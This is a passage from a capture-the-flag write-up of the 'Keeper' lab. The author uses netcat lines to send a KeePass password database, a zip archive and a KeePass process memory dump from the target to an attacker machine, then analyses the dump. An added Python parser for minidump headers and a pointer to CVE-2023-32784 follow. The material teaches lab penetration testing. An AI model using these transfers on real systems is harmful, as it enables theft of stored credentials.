KeePass


So far, the KeePass crash dump has been mentioned by multiple sources: the ticket in the web application, which is linked to the mail system, and PEAS, which detected the file.

lnorgaard@keeper:~$ ll
total 332868
drwxr-xr-x 5 lnorgaard lnorgaard      4096 aug 14 16:29 ./
drwxr-xr-x 3 root      root           4096 may 24 16:09 ../
lrwxrwxrwx 1 root      root              9 may 24 15:55 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard       220 may 23 14:43 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard      3771 may 23 14:43 .bashrc
drwx------ 2 lnorgaard lnorgaard      4096 may 24 16:09 .cache/
drwx------ 3 lnorgaard lnorgaard      4096 aug 14 16:41 .gnupg/
-rwxr-x--- 1 lnorgaard lnorgaard 253395188 may 24 12:51 KeePassDumpFull.dmp*
-rw-rw-r-- 1 lnorgaard lnorgaard        31 aug 13 00:40 KeePassStrings
-rw------- 1 lnorgaard lnorgaard        20 aug 14 02:22 .lesshst
-rwxr-x--- 1 lnorgaard lnorgaard      3630 may 24 12:51 passcodes.kdbx*
-rw------- 1 lnorgaard lnorgaard       807 may 23 14:43 .profile
-rw------- 1 lnorgaard lnorgaard         5 aug 13 00:41 .python_history
-rw-r--r-- 1 root      root       87391651 aug 14 16:44 RT30000.zip
drwx------ 2 lnorgaard lnorgaard      4096 jul 24 10:25 .ssh/
-rw-r----- 1 root      lnorgaard        33 aug 10 20:09 user.txt
-rw-r--r-- 1 root      root             39 jul 20 19:03 .vimrc

Checking the home directory of the lnorgaard user reveals a few interesting files: KeePassDumpFull.dmp, passcodes.kdbx and RT30000.zip.

I will transfer them all to Kali to run the analysis locally.

lnorgaard@keeper:~$ cat KeePassStrings 
Please ask your administrator.

There is also a text file, KeePassStrings, which doesn't reveal anything.

RT30000.zip


lnorgaard@keeper:~$ md5sum ./RT30000.zip 
c29f90dbb88d42ad2d38db2cb81eed21  ./RT30000.zip
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < RT30000.zip 
 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > RT30000.zip
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 41504
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./RT30000.zip
c29f90dbb88d42ad2d38db2cb81eed21  ./RT30000.zip

Transferring the RT30000.zip file to Kali; the MD5 hash matches on both ends, so the copy is intact.

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file RT30000.zip                
RT30000.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ 7z l RT30000.zip 
 
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
 
Scanning the drive for archives:
1 file, 87391651 bytes (84 MiB)
 
Listing archive: RT30000.zip
 
--
Path = RT30000.zip
Type = zip
Physical Size = 87391651
 
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2023-05-24 12:51:31 .....    253395188     87387677  KeePassDumpFull.dmp
2023-05-24 12:51:11 .....         3630         3630  passcodes.kdbx
------------------- ----- ------------ ------------  ------------------------
2023-05-24 12:51:31          253398818     87391307  2 files

The RT30000.zip archive contains both KeePassDumpFull.dmp and passcodes.kdbx. This must be the attachment that the root user put in the mail.

passcodes.kdbx


lnorgaard@keeper:~$ md5sum ./passcodes.kdbx 
524564c6269378457e8101b74b4b2b2a  ./passcodes.kdbx
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < passcodes.kdbx
 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > passcodes.kdbx     
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 38188
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./passcodes.kdbx
524564c6269378457e8101b74b4b2b2a  ./passcodes.kdbx

Transferring the passcodes.kdbx file to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file passcodes.kdbx     
passcodes.kdbx: Keepass password database 2.x KDBX

The passcodes.kdbx file is a KeePass password database. Interestingly, it uses the version 2.x format, which might point to a specific vulnerability.

The DB itself is locked with a password.

KeePassDumpFull.dmp


lnorgaard@keeper:~$ md5sum ./KeePassDumpFull.dmp
8899ee7c8b17da8716a89580b39194d3  ./KeePassDumpFull.dmp
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < KeePassDumpFull.dmp
 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > KeePassDumpFull.dmp  
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 58210
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./KeePassDumpFull.dmp
8899ee7c8b17da8716a89580b39194d3  ./KeePassDumpFull.dmp

Transferring the KeePassDumpFull.dmp file to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file KeePassDumpFull.dmp 
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type

The KeePassDumpFull.dmp file is a Windows minidump of a KeePass process.

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ volatility imageinfo -f  KeePassDumpFull.dmp -v
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : No suggestion (Instantiated with no profile)
                     AS Layer1 : FileAddressSpace (/home/kali/archive/htb/labs/keeper/KeePassDumpFull.dmp)
                      PAE type : No PAE

Unfortunately, Volatility wasn't able to determine an image profile: it searches for a kernel KDBG structure, which a user-mode process minidump doesn't contain.
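As an added example that is not part of this writeup, the following Python script parses the MINIDUMP_HEADER and stream directory of a dump such as KeePassDumpFull.dmp and decodes the 0x1806 flag value that `file` reported. The embedded sample dump is constructed (its stream sizes and offsets are fake); passing a real dump path on the command line is optional.

```python
import mmap
import struct
import sys
from datetime import datetime, timezone

# MINIDUMP_HEADER and MINIDUMP_DIRECTORY layouts from dbghelp.h (little-endian).
HEADER_FMT = "<4sIIIIIQ"  # Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIR_FMT = "<III"          # StreamType, Location.DataSize, Location.Rva
MINIDUMP_FLAGS = {        # MINIDUMP_TYPE bits; the 0x1806 reported by `file` above is all four of these
    0x0002: "MiniDumpWithFullMemory", 0x0004: "MiniDumpWithHandleData",
    0x0800: "MiniDumpWithFullMemoryInfo", 0x1000: "MiniDumpWithThreadInfo"}
STREAM_TYPES = {3: "ThreadListStream", 4: "ModuleListStream", 7: "SystemInfoStream",
                9: "Memory64ListStream", 16: "MemoryInfoListStream", 17: "ThreadInfoListStream"}

def parse_minidump(data) -> dict:
    """Parse the header and stream directory of a user-mode minidump (bytes or mmap)."""
    sig, ver, nstreams, dir_rva, _csum, ts, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != b"MDMP":
        raise ValueError("not a minidump (missing MDMP signature)")
    streams = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIR_FMT, data, dir_rva + 12 * i)
        streams.append((STREAM_TYPES.get(stype, f"Stream{stype}"), size, rva))
    return {
        "version": ver & 0xFFFF,  # low word is MINIDUMP_VERSION (0xA793); high word is writer-specific
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
        "streams": streams, "flags": flags,
        "flag_names": [n for bit, n in MINIDUMP_FLAGS.items() if flags & bit],
        # A minidump holds one process's address space, not the kernel, so there is no KDBG
        # for Volatility 2 to key a profile on; full memory means the heap contents are present.
        "full_memory": bool(flags & 0x2) and any(s[0] == "Memory64ListStream" for s in streams)}

def build_sample_minidump() -> bytes:
    # Constructed 68-byte sample: header + 3 directory entries, Flags 0x1806; sizes/RVAs are fake.
    header = struct.pack(HEADER_FMT, b"MDMP", 0xA793, 3, 32, 0, 1684503981, 0x1806)
    entries = [(7, 56, 68), (9, 0, 124), (17, 0, 124)]
    return header + b"".join(struct.pack(DIR_FMT, *e) for e in entries)

if __name__ == "__main__":
    if len(sys.argv) > 1:  # real dump: mmap it so a 250 MB file is not copied into memory
        with open(sys.argv[1], "rb") as f:
            info = parse_minidump(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ))
    else:
        info = parse_minidump(build_sample_minidump())
    print(f"{len(info['streams'])} streams, {info['timestamp']:%Y-%m-%d %H:%M:%S} UTC, "
          f"flags 0x{info['flags']:x} ({', '.join(info['flag_names'])}), full memory: {info['full_memory']}")
    for name, size, rva in info["streams"]:
        print(f"  {name:<22} size={size:<10} rva=0x{rva:x}")
```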

Looking it up online reveals an exploit PoC for a vulnerability, CVE-2023-32784 (https://nvd.nist.gov/vuln/detail/cve-2023-32784).